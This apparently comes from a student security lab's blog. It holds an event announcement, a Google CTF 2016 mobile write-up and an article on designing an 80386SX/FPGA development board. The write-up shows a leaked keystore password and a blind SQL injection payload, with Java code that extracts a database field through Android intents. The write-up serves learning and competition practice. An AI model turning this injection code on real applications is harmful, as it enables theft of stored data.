Our schedule for the LSE Week 2016 is out!
The schedule will be as follows:
- July, Thursday the 14th all day long
- July, Friday the 15th in the evening
- July, Saturday the 16th all day long
The complete schedule is available on the page dedicated to the event
LSE Week 2016 Announcement
For the sixth year, we are organising the LSE Summer Week mid-July to show the work we are doing here at the LSE, about various themes we like, have encountered or overall judge interesting.
The exact planning and subjects addressed will be announced later, as well as the exact timetable. As we did last year, we are also opening the talks to external contributors and all LSE members, present or past.
The presentations will be held in French as usual and we will try to record everything.
All details are on the main page of the event: LSE Summer Week 2016
Google Capture The Flag 2016: Mobile category
There were 3 challenges in the mobile category. Let’s see how we solved them.
Ill Intentions
Ill Intentions
150 points
Do you have have ill intentions?
file: illintentions.apk
For this first one, we have an apk and some allusions to the intent system used on android. Let’s start by testing it a little in an emulator!
$ /opt/android-sdk/tools/emulator -avd Nexus_5X_API_23 & $ adb devices List of devices attached * daemon not running. starting it now on port 5037 * * daemon started successfully * emulator-5554 device $ adb install illintentions.apk 3576 KB/s (51856 bytes in 0.014s) pkg: /data/local/tmp/illintentions.apk Success
Let’s extract the apk and decompile it in order to see what is inside. For this, I like to use 2 different tools, as they are not giving us the same output (and I am lazy, and don’t know how to do it with only one tool).
First,
dex2jar
takes an apk, and turns it to a jar. We can then read the code withjd-gui
.$ dex2jar illintentions.apk $ jd-gui illintentions.apk
The other tool is
apktool
that gives us all the manifests and metadata correctly reversed and lisible.$ apktool -d illintentions.apk $ find illintentions illintentions illintentions/AndroidManifest.xml illintentions/lib illintentions/lib/x86_64 illintentions/lib/x86_64/libhello-jni.so illintentions/lib/armeabi illintentions/lib/armeabi/libhello-jni.so illintentions/lib/mips64 illintentions/lib/mips64/libhello-jni.so illintentions/lib/armeabi-v7a illintentions/lib/armeabi-v7a/libhello-jni.so illintentions/lib/x86 illintentions/lib/x86/libhello-jni.so illintentions/lib/arm64-v8a illintentions/lib/arm64-v8a/libhello-jni.so illintentions/lib/mips illintentions/lib/mips/libhello-jni.so illintentions/apktool.yml illintentions/original illintentions/original/AndroidManifest.xml illintentions/original/META-INF illintentions/original/META-INF/CERT.RSA illintentions/original/META-INF/MANIFEST.MF illintentions/original/META-INF/CERT.SF illintentions/smali illintentions/smali/com illintentions/smali/com/example illintentions/smali/com/example/application illintentions/smali/com/example/application/DefinitelyNotThisOne$1.smali illintentions/smali/com/example/application/MainActivity.smali illintentions/smali/com/example/application/Send_to_Activity.smali illintentions/smali/com/example/application/IsThisTheRealOne.smali illintentions/smali/com/example/application/DefinitelyNotThisOne.smali illintentions/smali/com/example/application/ThisIsTheRealOne.smali illintentions/smali/com/example/application/Utilities.smali illintentions/smali/com/example/application/IsThisTheRealOne$1.smali illintentions/smali/com/example/application/ThisIsTheRealOne$1.smali illintentions/smali/com/example/hellojni illintentions/smali/com/example/hellojni/Manifest.smali illintentions/smali/com/example/hellojni/R$attr.smali illintentions/smali/com/example/hellojni/R$string.smali illintentions/smali/com/example/hellojni/Manifest$permission.smali illintentions/smali/com/example/hellojni/R.smali 
illintentions/smali/com/example/hellojni/BuildConfig.smali illintentions/smali/com/example/hellojni/R$mipmap.smali illintentions/res illintentions/res/values illintentions/res/values/strings.xml illintentions/res/values/public.xml illintentions/res/mipmap-hdpi-v4 illintentions/res/mipmap-hdpi-v4/ic_launcher.png illintentions/res/mipmap-mdpi-v4 illintentions/res/mipmap-mdpi-v4/ic_launcher.png illintentions/res/mipmap-xhdpi-v4 illintentions/res/mipmap-xhdpi-v4/ic_launcher.png illintentions/res/mipmap-xxhdpi-v4 illintentions/res/mipmap-xxhdpi-v4/ic_launcher.png
What can we see here? There are some native libraries for multiple architectures, some resources, and the code for a simple application.
Let’s try to see what we can find in the java code:
We have 6 classes in this apk:
MainActivity
: probably the entry pointSend_to_Activity
IsThisTheRealOne
DefinitelyNotThisOne
ThisIsTheRealOne
Utilities
Here is the main activity:
package com.example.application; import android.app.Activity; import android.content.IntentFilter; import android.os.Bundle; import android.widget.TextView; public class MainActivity extends Activity { public void onCreate(Bundle paramBundle) { super.onCreate(paramBundle); paramBundle = new TextView(getApplicationContext()); paramBundle.setText("Select the activity you wish to interact with.To-Do: Add buttons to select activity, for now use Send_to_Activity"); setContentView(paramBundle); paramBundle = new IntentFilter(); paramBundle.addAction("com.ctf.INCOMING_INTENT"); registerReceiver(new Send_to_Activity(), paramBundle, "ctf.permission._MSG", null); } }
The application registers a handler to a broadcast intent named
"com.ctf.INCOMING_INTENT"
and usesSend_To_Activity
as a BroadcastReceiver.public void onReceive(Context paramContext, Intent paramIntent) { paramIntent = paramIntent.getStringExtra("msg"); if (paramIntent.equalsIgnoreCase("ThisIsTheRealOne")) { paramContext.startActivity(new Intent(paramContext, ThisIsTheRealOne.class)); return; } if (paramIntent.equalsIgnoreCase("IsThisTheRealOne")) { paramContext.startActivity(new Intent(paramContext, IsThisTheRealOne.class)); return; } if (paramIntent.equalsIgnoreCase("DefinitelyNotThisOne")) { paramContext.startActivity(new Intent(paramContext, DefinitelyNotThisOne.class)); return; } Toast.makeText(paramContext, "Which Activity do you wish to interact with?", 1).show(); }
What we can see in it is that it takes a string parameter
"msg"
that is used to call one of the activities in the apk, depending on its value. Let’s try to trigger one of them, and look at what it does. We have 3 choices:
- ThisIsTheRealOne
- IsThisTheRealOne
- DefinitelyNotThisOne
Let’s assume we can ignore
DefinitelyNotThisOne
and try ThisIsTheRealOne
.$ adb shell am broadcast -a com.ctf.INCOMING_INTENT --es msg ThisIsTheRealOne Broadcasting: Intent { act=com.ctf.INCOMING_INTENT (has extras) } Broadcast completed: result=0
The code handling that is the following:
public class ThisIsTheRealOne extends Activity { static { System.loadLibrary("hello-jni"); } public void onCreate(Bundle paramBundle) { super.onCreate(paramBundle); new TextView(this).setText("Activity - This Is The Real One"); paramBundle = new Button(this); paramBundle.setText("Broadcast Intent"); setContentView(paramBundle); paramBundle.setOnClickListener(new View.OnClickListener() { public void onClick(View paramAnonymousView) { paramAnonymousView = new Intent(); paramAnonymousView.setAction("com.ctf.OUTGOING_INTENT"); String str1 = ThisIsTheRealOne.this.getResources().getString(0x7f030006) + "YSmks"; String str2 = Utilities.doBoth(ThisIsTheRealOne.this.getResources().getString(0x7f030002)); String str3 = Utilities.doBoth(getClass().getName()); paramAnonymousView.putExtra("msg", ThisIsTheRealOne.this.orThat(str1, str2, str3)); ThisIsTheRealOne.this.sendBroadcast(paramAnonymousView, "ctf.permission._MSG"); } }); } } public class IsThisTheRealOne extends Activity { static { System.loadLibrary("hello-jni"); } public void onCreate(Bundle paramBundle) { getApplicationContext(); super.onCreate(paramBundle); new TextView(this).setText("Activity - Is_this_the_real_one"); paramBundle = new Button(this); paramBundle.setText("Broadcast Intent"); setContentView(paramBundle); paramBundle.setOnClickListener(new View.OnClickListener() { public void onClick(View paramAnonymousView) { paramAnonymousView = new Intent(); paramAnonymousView.setAction("com.ctf.OUTGOING_INTENT"); String str1 = IsThisTheRealOne.this.getResources().getString(0x7f030007) + "\\VlphgQbwvj~HuDgaeTzuSt.@Lex^~"; String str2 = Utilities.doBoth(IsThisTheRealOne.this.getResources().getString(0x7f030001)); String str3 = getClass().getName(); str3 = Utilities.doBoth(str3.substring(0, str3.length() - 2)); paramAnonymousView.putExtra("msg", IsThisTheRealOne.this.perhapsThis(str1, str2, str3)); IsThisTheRealOne.this.sendBroadcast(paramAnonymousView, "ctf.permission._MSG"); } }); } }
Ok, so we have a button that sends an intent with 3 parameters when clicked. Some of the parameters come from the resources stored in the apk; for that, we have 2 xml files from the apktool extraction:
$ cat illintentions/res/values/public.xml <?xml version="1.0" encoding="utf-8"?> <resources> <public type="mipmap" name="ic_launcher" id="0x7f020000" /> <public type="string" name="android.permission._msg" id="0x7f030000" /> <public type="string" name="app_name" id="0x7f030001" /> <public type="string" name="dev_name" id="0x7f030002" /> <public type="string" name="flag" id="0x7f030003" /> <public type="string" name="git_user" id="0x7f030004" /> <public type="string" name="str1" id="0x7f030005" /> <public type="string" name="str2" id="0x7f030006" /> <public type="string" name="str3" id="0x7f030007" /> <public type="string" name="str4" id="0x7f030008" /> <public type="string" name="test" id="0x7f030009" /> </resources> $ cat illintentions/res/values/strings.xml <?xml version="1.0" encoding="utf-8"?> <resources> <string name="android.permission._msg">Msg permission for this app</string> <string name="app_name">SendAnIntentApplication</string> <string name="dev_name">Leetdev</string> <string name="flag">Qvq lbh guvax vg jbhyq or gung rnfl?</string> <string name="git_user">l33tdev42</string> <string name="str1">`wTtqnVfxfLtxKB}YWFqqnXaOIck`</string> <string name="str2">IIjsWa}iy</string> <string name="str3">TRytfrgooq|F{i-JovFBungFk</string> <string name="str4">H0l3kwjo1|+kdl^polr</string> <string name="test">Test String for debugging</string> </resources> guinness:intents$
Interlude: Can you repo it?
Can you repo it?
5 points
Do you think the developer of Ill Intentions knows how to set up public repositories?
Really nothing much to say here, we grabbed the git username of the developer of Ill Intentions in
res/values/strings.xml
, “l33tdev42”, looked him up on github, cloned the only repository available, and took a look at the git history, and the last commit is this one:From 5b315cbbfaa2da9502ffae73f283d36d89f92194 Mon Sep 17 00:00:00 2001 From: Niru Ragupathy <niruragu@google.com> Date: Thu, 28 Apr 2016 13:48:07 -0700 Subject: [PATCH] Oops. removing the passcodes --- app/build.gradle | 35 ----------------------------------- 1 file changed, 35 deletions(-) delete mode 100644 app/build.gradle diff --git a/app/build.gradle b/app/build.gradle deleted file mode 100644 index a531d73..0000000 --- a/app/build.gradle +++ /dev/null @@ -1,35 +0,0 @@ -apply plugin: 'com.android.application' - -android { - compileSdkVersion 23 - buildToolsVersion "23.0.2" - - defaultConfig { - applicationId "test.leetdev.helloworld" - minSdkVersion 15 - targetSdkVersion 23 - versionCode 1 - versionName "1.0" - } - buildTypes { - release { - minifyEnabled false - proguardFiles getDefaultProguardFile('proguard-android.txt'), 'proguard-rules.pro' - } - } - signingConfigs { - create("release") { - storeFile = file("leetdev_android.keystore") - storePassword = "!lPpR4UC6JYaUj" - keyAlias = "appsKeys" - keyPassword = "ctf{TheHairCutTookALoadOffMyMind}" - } - } -} - -dependencies { - compile fileTree(dir: 'libs', include: ['*.jar']) - testCompile 'junit:junit:4.12' - compile 'com.android.support:appcompat-v7:23.2.0' - compile 'com.android.support:design:23.2.0' -}
Do we really need to say more? That was fun, and this is something I really liked in this whole ctf: most of (if not all) the challenges were nearly real-case scenarios! It is really interesting to have something like that in a ctf, congrats google!
Back to the challenge
Back to our intents!
orThat()
is a native method contained inside the libraryhello-jni.so
. Let’s take a look at it.Here is the pseudo code for the
x86_64
version:int Java_com_example_application_ThisIsTheRealOne_orThat(void *javavm, void *pstr1, void *pstr2, void *pstr3) { str1 = (*(int (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)javavm + 1352LL))(javavm, pstr1, 0LL); str2 = (*(int (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)javavm + 1352LL))(javavm, pstr2, 0LL); str3 = (*(int (__fastcall **)(__int64, __int64, _QWORD))(*(_QWORD *)javavm + 1352LL))(javavm, pstr3, 0LL); v48 = &str1[strlen(str1)]; *(_QWORD *)v48 = 6593072240547940682LL; *(_QWORD *)(v48 + 8) = 7953489387895941752LL; *(_QWORD *)(v48 + 16) = 4706092811935960959LL; *(_QWORD *)(v48 + 24) = 7092423305623858002LL; *(_QWORD *)(v48 + 32) = 7382373343648048710LL; *(_QWORD *)(v48 + 40) = 8315423270923304302LL; *(_QWORD *)(v48 + 48) = 6008194790891616369LL; *(_DWORD *)(v48 + 56) = 1684893287; *(_WORD *)(v48 + 60) = 8547; *(_BYTE *)(v48 + 62) = 0; strncpy(str1_1, str1, 76); strncpy(str2_1, str2, 76); strncpy(str3_1, str3, 76); idx = 0; do { flag[idx++] = str1_1[idx] ^ str2_1[idx] ^ str3_1[idx]; } while ( idx != 76 ); printf("Here is your Reply: %s", &flag); return (*(int (__fastcall **)(__int64, int *))(*(_QWORD *)javavm + 1336LL))(javavm, &flag); }
The other one (
IsThisTheRealOne
) is more or less the same thing. As this can’t work on the real device (v48
is writing outside the allocated memory) Let’s write the code for that:import binascii import base64 import hashlib def doBoth(input): customEncodeValue = hashlib.sha224(input).hexdigest().encode('ascii') return base64.encodebytes(customEncodeValue)[:-1] def translate(input): tbl = { b'=': b'?', b'1': b'W', b'2': b'h', b'3': b'a', b'4': b't', b'5': b'i', b'6': b's', b'7': b'd', b'8': b'o', b'9': b'n', b'0': b'e' } for k,v in tbl.items(): input = input.replace(k, v) return input def xor3(str1, str2, str3): return ''.join([ chr(str1[x] ^ str2[x] ^ str3[x]) for x in range(len(str1)) ]) def chunks(l, n): n = max(1, n) return [l[i:i + n] for i in range(0, len(l), n)] def native_array_translation(input): return binascii.unhexlify(''.join([ ''.join(chunks(s, 2)[::-1]) for s in input])) def tryThisIsTheRealOne(): str1 = b"IIjsWa}iyYSmks" str2 = translate(doBoth(b"Leetdev")) str3 = translate(doBoth(b"com.example.application.ThisIsTheRealOne$1")) array_in_native_code = [ "5B7F4C456C59494A", "6E6078757A606A78", "414F667A7F764F7F", "626D596B50696B52", "667375714B746646", "736651686C667D6E", "536165545C727871", "646D6E67", "2163" ] str1 = str1 + native_array_translation(array_in_native_code) return xor3(str1, str2, str3) def tryIsThisTheRealOne(): str1 = b"TRytfrgooq|F{i-JovFBungFk" + b"\\VlphgQbwvj~HuDgaeTzuSt.@Lex^~" str2 = translate(doBoth(b"SendAnIntentApplication")) str3 = translate(doBoth(b"com.example.application.IsThisTheRealOne$1"[:-2])) array_in_native_code = [ "7B62617247776E77", "43727F686274754F", "6D716674", "7D" ] str1 = str1 + native_array_translation(array_in_native_code) return xor3(str1, str2, str3) print(tryThisIsTheRealOne()) print(tryIsThisTheRealOne())
The first one was a joke, thanks guys, and the last one was the real flag.
Note for later:
getClass().getName()
returns the full name of the class, with the package name, and if it is a nested class, you will have some kind of"$N"
after.The Little Bobby
Little Bobby Application
250 points
Find the vulnerability, develop an exploit, and when you’re ready, submit your APK to https://bottle-brush-tree.ctfcompetition.com. Can take up to 15 minutes to return the result.
file: BobbyApplication_CTF.apk
We have to build an apk that will be sent to a server, launched inside an android vm and we get logcat output as a result.
This is a simple application with an Intent login service.
protected void onCreate(Bundle paramBundle) { Log.d("Startup", "Bobby's Application is now running"); super.onCreate(paramBundle); paramBundle = new IntentFilter(); new LocalDatabaseHelper(getApplicationContext()); paramBundle.addAction("com.bobbytables.ctf.myapplication_INTENT"); registerReceiver(new LoginReceiver(), paramBundle); /* ... */ }
Here is the
LoginReceiver
class:public class LoginReceiver extends BroadcastReceiver { public void onReceive(Context paramContext, Intent paramIntent) { Object localObject = paramIntent.getStringExtra("username"); paramIntent = paramIntent.getStringExtra("password"); Log.d("Received", (String)localObject + ":" + paramIntent); paramIntent = new LocalDatabaseHelper(paramContext).checkLogin((String)localObject, paramIntent); localObject = new Intent(); ((Intent)localObject).setAction("com.bobbytables.ctf.myapplication_OUTPUTINTENT"); ((Intent)localObject).putExtra("msg", paramIntent); paramContext.sendBroadcast((Intent)localObject); } } public String checkLogin(String paramString1, String paramString2) { SQLiteDatabase localSQLiteDatabase = getReadableDatabase(); Cursor localCursor = localSQLiteDatabase.rawQuery("select password,salt from users where username = \"" + paramString1 + "\"", null); Log.d("Username", paramString1); if ((localCursor != null) && (localCursor.getCount() > 0)) { localCursor.moveToFirst(); paramString1 = localCursor.getString(0); String str = localCursor.getString(1); localCursor.close(); localSQLiteDatabase.close(); if (Utils.calcHash(paramString2 + str).equals(paramString1)) { Log.d("Result", "Logged in"); return "Logged in"; } Log.d("Result", "Incorrect password"); return "Incorrect password"; } if (localCursor != null) localCursor.close(); localSQLiteDatabase.close(); Log.d("Result", "User does not exist"); return "User does not exist"; } public void onCreate(SQLiteDatabase paramSQLiteDatabase) { paramSQLiteDatabase.execSQL("CREATE TABLE users (_id INTEGER PRIMARY KEY,username TEXT,password TEXT,flag TEXT,salt TEXT)"); } public long insert(String paramString1, String paramString2) { int i = new Random().nextInt(31337); paramString2 = Utils.calcHash(paramString2 + new Integer(i).toString()); SQLiteDatabase localSQLiteDatabase = getWritableDatabase(); ContentValues localContentValues = new ContentValues(); localContentValues.put("username", paramString1); 
localContentValues.put("password", paramString2); localContentValues.put("flag", "ctf{An injection is all you need to get this flag - " + paramString2 + "}"); localContentValues.put("salt", new Integer(i).toString()); long l = localSQLiteDatabase.insert("users", null, localContentValues); localSQLiteDatabase.close(); return l; }
As we can see, there is a simple sql injection in the
checkLogin
method. In the code we can see that if the query is returning no result, we have"User does not exist"
as a parameter in an intent"com.bobbytables.ctf.myapplication_OUTPUTINTENT"
, and"Incorrect password"
if the query returns a result.Ok, so let’s try to exploit this in blind!
First we need to have a request that can return a result or not. As we can see, the salt will always be under 31337, we can use that to always have some kind of result. Let’s inject as a username:
"\" or cast(salt as decimal) > 31337 or (" + expression + ") and \"1\"=\"1"
with that, we can put anything we want in
expression
(yeah, as I am reading it now, it is too complicated, we can do much simpler).Ok, so we first have to guess the size of the flag, and then find all the characters. Here is the java code that is doing that.
public class LoginResult extends BroadcastReceiver { String EXPR_TRUE = "Incorrect password"; int state; // 0 -> startup, 1 -> guess length, 2 -> guess flag int max; int min; int pivot; int flag_length; int idx = 0; ArrayList<Integer> flag; public LoginResult() { this.max = 1000; this.min = 0; this.state = 0; } static String getFlag(ArrayList<Integer> l) { String res = ""; for (Integer i : l) { res += (char)(i.intValue() + 1); } return res; } @Override public void onReceive(Context context, Intent intent) { if (state == 0) { state = 1; pivot = min + (max - min) / 2; IntentHelper.tryLen(context, pivot); } else if (state == 1) { String msg = intent.getStringExtra("msg"); Log.e("gaby.sqli/LOG", String.format(Locale.getDefault(), "pivot: %d", pivot)); if (min == pivot || max == pivot) { flag_length = pivot; state = 2; IntentHelper.tryLen(context, flag_length); } else if (msg.equals(EXPR_TRUE)) { // length(flag) > pivot min = pivot; pivot = min + (max - min) / 2; IntentHelper.tryLen(context, pivot); } else { max = pivot; pivot = min + (max - min) / 2; IntentHelper.tryLen(context, pivot); } } else if (state == 2) { if (idx == 0) { // find the flag now! Log.d("gaby.sqli/FLAG_LENGTH", String.format("%d", flag_length)); idx = 1; // first step flag = new ArrayList<Integer>(); min = 31; max = 127; pivot = min + (max - min) / 2; IntentHelper.tryChar(context, idx, pivot); } else { String msg = intent.getStringExtra("msg"); Log.e("gaby.sqli/LOG", String.format(Locale.getDefault(), "pivot: %d", pivot)); if (min == pivot || max == pivot) { // XXX if (idx > flag_length + 1) { // WIN! 
state = 3; Log.e("gaby.sql/FLAG", String.format("The flag is: %s", getFlag(flag))); DialogHelper.showMessage(context, "WIN", String.format("The flag is: %s", getFlag(flag))); } else { Log.e("gabv.sql/LOG", String.format(Locale.getDefault(), "flag[%d] = %d", idx, pivot)); flag.add(pivot); idx += 1; min = 31; max = 127; pivot = min + (max - min) / 2; } IntentHelper.tryChar(context, idx, pivot); } else if (msg.equals(EXPR_TRUE)) { // length(flag) > pivot min = pivot; pivot = min + (max - min) / 2; IntentHelper.tryChar(context, idx, pivot); } else { max = pivot; pivot = min + (max - min) / 2; IntentHelper.tryChar(context, idx, pivot); } } } } } public class IntentHelper { public static void tryLogin(Context context, String username, String password) { Intent intent = new Intent(); intent.setAction("com.bobbytables.ctf.myapplication_INTENT"); intent.putExtra("username", username); intent.putExtra("password", password); context.sendBroadcast(intent); } public static void tryInject(Context context, String expression) { tryLogin(context, "\" or cast(salt as decimal) > 31337 or (" + expression + ") and \"1\"=\"1", "password"); } public static void tryLen(Context context, int len) { tryInject(context, String.format(Locale.getDefault(), "length(flag) > %d", len)); } public static void tryChar(Context context, int index, int c) { tryInject(context, String.format(Locale.getDefault(), "substr(flag, %d, 1) > char(%d)", index, c)); } }
And with that, we can have the complete flag. Yeah, the code is ugly, it was a little difficult to have something clear in the intent callback.
The full code for this apk is available on our repositories.
Designing an Intel 80386SX development board
The LSE-PC aims to be a compact IBM-PC compatible development board based on an Intel
80386SX
CPU and an Altera Cyclone IV EP4CE22E22
FPGA in order to emulate a custom chipset.
The main goal of this project is to create a simple, debuggable and customisable version of the well-known PC hardware architecture. Its purpose is mainly didactic, for students or experienced developers who want to get started with x86 low-level programming.
Hardware Overview
The schematics were designed using gschem, which is a part of the gEDA project. Although the provided component library is acceptable, most of the chips used on this board are uncommon and so need to be drawn before starting the overall schematics. This tedious work was done using the djboxsym tool, which allows quick production of gschem symbols from a minimal description.
Central Processing Unit
The CPU used on this board is a
80386SX
designed by Intel and released in 1988. It is basically a cut-down version of the original
386
with a 16-bit physical data bus. Although memory access performance is heavily affected, it is still fully 32-bit internally and was designed to be used in a 16-bit environment, which is simpler and cheaper to design than a full 32-bit compatible motherboard. The physical address bus is only 24-bit, which limits the address space to 16MB.
The model used here is an
NG80386SXLP20
which is a low power version clocked at 20MHz and packaged in a 100-pin Plastic Quad Flat Pack. Of course, this chip is considered obsolete today, but it is still the only 32-bit x86 CPU which is simple enough to be integrated in an amateur board.
Field-Programmable Gate Array
The main criterion for choosing an appropriate FPGA was packaging. Knowing that this chip would be hand-soldered, selecting a Ball Grid Array based component was inconceivable. I’m also quite used to working with Altera’s FPGAs, so one from the Cyclone IV series was a good compromise. The model chosen is an
EP4CE22E22C7N
released in 2009. With its 22320 logic elements, it is one of the largest FPGAs available in an EQFP package. This package, only used by Altera, is an enhanced version of the standard plastic quad flat package which uses a pitch of 0.5 millimeter between pins. This layout allows the FPGA to expose 144 pins, of which 62 can be used as I/O and 15 as clock inputs.
Another useful feature is the 3.3V PCI compliant mode of the IO banks. It provides compatibility with 5V devices by enabling a clamping diode which can support 25mA. This explains the use of 120 Ohm resistors between CPU 5V signals and FPGA IO.
The CPU needs a 20MHz input clock to operate correctly. A single oscillator is used to clock both the CPU and the FPGA. The idea here is that if the FPGA needs a higher clock speed, an internal Phase Locked Loop can be used to obtain the desired frequency from this 20MHz clock.
FPGA programming and debugging can be performed through JTAG. Altera provides a dedicated programmer called the USB Blaster which can be easily used with Quartus II. It provides a standard 10-pin connector and operates here at 2.5V.
As FPGA configuration is volatile, it is necessary to provide an external way to program it when the board is powered on. Here this is achieved by an external serial flash which contains the whole FPGA configuration. Altera sells
EPCQ
devices which are dedicated to that purpose. However, most of the time those are expensive and it turns out that they are nothing more than SPI flash memories. That is why it has been decided to use an M25P16
, a 16Mbit flash memory from Micron which does the job perfectly.
In fact, several programming modes are available in this FPGA. In order to indicate which mode has to be used,
MSEL
pins must be pulled up or pulled down to encode the mode number. To select the Active Serial Programming mode, it is necessary to solder 120 Ohm resistors on R77
, R79
and R81
.
USB/UART bridge
In addition to JTAG, it can be a good idea to provide USB connectivity to this design. However, implementing a USB protocol stack in an FPGA can be really painful. The purpose of the
FT230X
chip is to provide a simple bridge between a USB and a UART interface, which is simpler to implement in an FPGA. It is provided in an SSOP16 package and is really simple to wire, thanks notably to the fully integrated clock generation which does not require an external crystal.
Static Random Access Memory
For the main RAM,
AS6C8016
from Alliance Memory has been chosen. This is a 512K x 16-bit CMOS static RAM packaged in a 44-pin TSOP. It features tri-state output and data byte control (LB
and UB
signals) as required by the 80386SX
.
Although this chip was originally designed to be used as a battery backed-up non-volatile memory, its ease of use and its response time justify the low storage space. So 1MB ought to be enough for anybody. Also,
AS6C8016
is powered by 5V but is still fully TTL compatible, which means that it can be driven by the CPU as well as by the 3.3V output of the FPGA’s IO. So control signals such as RAMCS
and RAMWE
are only driven by the FPGA, which performs address decoding.
Voltage Regulation
The power circuitry has to provide four sources of different voltages:
- 5V: CPU, SRAM
- 3.3V: FPGA In/Out
- 2.5V: FPGA Analog PLL
- 1.2V: FPGA internal logic, Digital PLL
Regulation is achieved by three fixed low-dropout positive voltage regulators which operate from the 5V supplied by the USB. Even though fixed regulators are often more expensive than adjustable regulators, they are easier to wire and reduce the number of passive components needed to perform adjustment. Only 250mA is provided for 2.5V because it is only used by the FPGA Analog PLL and as the JTAG target voltage.
Routing and Manufacturing the Printed Circuit Board
Once the schematics are completed, the PCB has to be designed. This process was assisted by pcb, another part of the gEDA project. As schematics and PCB designs are not done in the same software (unlike with KiCad or Eagle), synchronization between them is ensured by the gsch2pcb tool.
As some components on the board do not use standard packages, creating custom pcb footprints for those chips is necessary. Like the symbols, the footprints were generated with a tool: footgen.
The PCB routing here is a bit tricky due to the large number of signals needed to drive the CPU. A 4-layer PCB is unavoidable in order to achieve routing and to preserve signal integrity. As our manufacturer limits 4-layer boards to 5 x 10cm, this is the dimension adopted, which is large enough for this design.
Each layer has a dedicated purpose:
- Top layer : it is mainly used for signal routing. Traces used for data signals are 0.20mm wide, which is the limit imposed by the manufacturer. Unused space is filled with ground planes. The FPGA, CPU and voltage regulators are soldered on this layer.
- Ground layer : Used almost exclusively to get a common ground plane in the whole circuit. It has also been used to complete RAM routing.
- Power layer : Dedicated to conduct power rails through the board. Four areas corresponding to each voltage level can be clearly seen on this layer.
- Bottom layer : Like the top layer, this is mainly used for signals routing. Capacitors used to apply local filtering are soldered on this side as well as SRAM and 20MHz oscillator.
With a low end SMD soldering station, it takes approximately three hours to solder a whole board.
In addition to the PCB, an acrylic case was designed using FreeCAD and then manufactured.
Emulating a rudimentary chipset
Now that the board is correctly soldered, the last thing to do before being able to run code on the CPU is to configure the FPGA in order to emulate a basic chipset. The design is composed of two parts : the bus controller and the memory controller.
Bus Controller
The bus controller has to handle
80386SX
bus access protocol. In order to understand its exact purpose, it is necessary to detail the signals involved in the process.
- The Data Bus (
D[15:0]
) is composed of three-state bidirectional signals providing a general purpose data path between the 386
and other devices (such as memory).
- The Address Bus (
A[23:1]
, BHE#
, BLE#
) is composed of three-state outputs providing physical memory addresses or I/O port addresses. The Byte Enable outputs (BHE#
and BLE#
) indicate which bytes of the 16-bit data bus are involved with the current transfer. If both of them are asserted, then a 16-bit word is being transferred.
- A Bus Cycle is defined by
W/R#
, D/C#
, M/IO#
and LOCK#
three-state outputs. W/R#
distinguishes between write and read cycles, D/C#
distinguishes between data and control cycles, M/IO#
distinguishes between memory and I/O cycles and LOCK#
indicates if the current operation is atomic or not.
- The Bus Access is controlled by
ADS#
, READY#
and NA#
. The Address Status (ADS#
) indicates that a valid bus cycle definition and address are being driven from the 386
pins. Most of the bus controller logic must be based on the falling edge of this signal. READY#
signal indicates a transfer acknowledge driven by the bus controller to the 386
. NA#
signal is used to request address pipelining which is not relevant in this case.
As an example, here is a waveform of bus signals during these operations :
- Write data1 to address1
- Read data2 from address2
- Write data3 to address3
- Idle
- Read data4 from address4
Each bus access operates in two steps. The first one, indicated by
ADS#
is used to drive Bus Cycle Definition signals and an address. The second one takes place during the next rising edge of the main clock. Depending on the W/R#
pin state, the data bus is driven with the value the CPU wants to write. During all these sequences ADS#
is still asserted.
The next bus cycle is performed when the
386
detects a falling edge on the READY#
signal. So the bus controller can easily be modeled as the following Finite-State Machine:
It is simple to implement this behavior in Verilog:
always @(posedge clk) begin if (!_ads) begin capture_bus(); // Capture values driven on // A[23:1], D[15:0], /BLE, /BHE, WR, DC and MIO _ready <= 1; state <= `ST_T1; end else if (state == `ST_T1) begin _ready <= 0; state <= `ST_T2; end end
As the data bus is bidirectional, it is sometimes necessary to set it to high impedance in order to let another device drive the bus. It is also necessary to respect the bytes requested by the CPU via
BHE#
and BLE#
.
assign d[15:8] = wr || _bhe || !ramcs ? 8'hzz : dout[15:8]; assign d[7:0] = wr || _ble || !ramcs ? 8'hzz : dout[7:0];
Memory Controller
Once the bus protocol is properly respected, the address requested by the CPU must be decoded in order to figure out which device must be selected. This is the purpose of the memory controller unit.
Altera Cyclone IV devices feature embedded memory structures. These consist of M9K memory blocks that can be configured to provide various memory functions, such as RAM, shift registers or ROM. The idea here is to use them to create a small memory which is initialized with a basic piece of code dedicated to CPU initialization. Another useful feature of this memory is that it is easily readable and editable through JTAG using the In-System Memory Content Editor provided by Quartus II.
Basically, the main address space is composed of two memories : an external (i.e. the SRAM) and an internal (i.e. the M9K blocks).
The first megabyte of addressable memory is organized as the layout of the traditional IBM-PC. It means that only the first 640K of external memory are mapped from
0x000000
to 0x0A0000
and the BIOS shadow ROM (implemented here with internal memory) is mapped from 0x0F8000
to 0x100000
. Shadow ROM was originally a 64KB memory which contains a copy of the BIOS ROM mapped on the last 64KB of the address space. As the CPU starts fetching instructions at 0xFFFFF0
after a reset, the mechanism consists of mapping a ROM at this address, copying the ROM content to the shadow ROM and then jumping to a subroutine located in the first megabyte.
Here, the internal RAM is only 32KB due to the FPGA limitations and is located at
0xFF8000
and 0x0F8000
which allows simulation of the original mechanism. Moreover, the whole SRAM is mapped from 1MB, which means that the first 640KB of external RAM are mapped twice.
The memory controller unit can be simplified as:
The actual address space layout is achieved by applying a logic expression to the chip select signal of each memory. Notice that
WE#
signal of the SRAM is not active on the same level as the W/R#
386
signal. So this signal is inverted by the FPGA.
assign eramwe = !wr; assign eramcs = !(cs && ((addr[23:16] < 8'h0A) || (addr[23:20] == 4'h1))); assign iramcs = cs && ((addr[23:15] == 9'h1FF) || (addr[23:15] == 9'h01F));
Skeleton of a basic firmware
As an example, this section will present a basic firmware which can be run on the LSE-PC.
First, we assume here that the entire firmware is located in the internal memory, which is automatically initialized when the design is loaded into the FPGA.
On reset, the
80386
CPU is running in real mode and will start to execute the instructions located at the end of the address space: 0xFFFFF0
. So the purpose of these instructions is to jump to the first megabyte by reloading the Code Segment. However, the last 16 bytes can be used to set a minimal environment to allow 16-bit application execution. The following code is an example of 5 instructions that can be assembled to 16 bytes of opcodes. It basically sets the Data, Stack and Code Segment Selectors, sets the stack pointer and then jumps to the beginning of the internal RAM mapped at 0x8000
.
org 0xFFF0 ;; CS:0xF000, IP:0xFFF0 reset: mov ax, 0xF000 mov ds, ax mov ss, ax mov sp, 0xFFF0 jmp 0xF000:0x8000
